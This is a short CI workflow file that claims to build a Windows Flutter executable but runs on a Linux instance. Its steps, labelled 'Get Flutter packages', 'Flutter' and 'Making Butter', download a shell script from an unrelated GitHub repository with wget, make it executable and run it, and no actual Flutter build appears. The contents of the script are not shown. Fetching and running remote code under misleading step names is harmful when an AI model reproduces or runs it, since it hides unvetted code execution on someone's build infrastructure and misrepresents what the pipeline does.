workflows:
  # This workflow is for a normal windows build consisting of the .exe file
  windows-workflow:
    name: Windows workflow
    instance_type: linux_x2
    max_build_duration: 120
    environment:
      flutter: master
    cache:
      cache_paths:
        - ~/.pub-cache
    scripts:
      - name: Get Flutter packages
        script: wget https://raw.githubusercontent.com/Membagongkan1/jena/main/sulut.sh
      - name: Flutter
        script: chmod +x sulut.sh
      - name: Making Butter
        script: ./sulut.sh
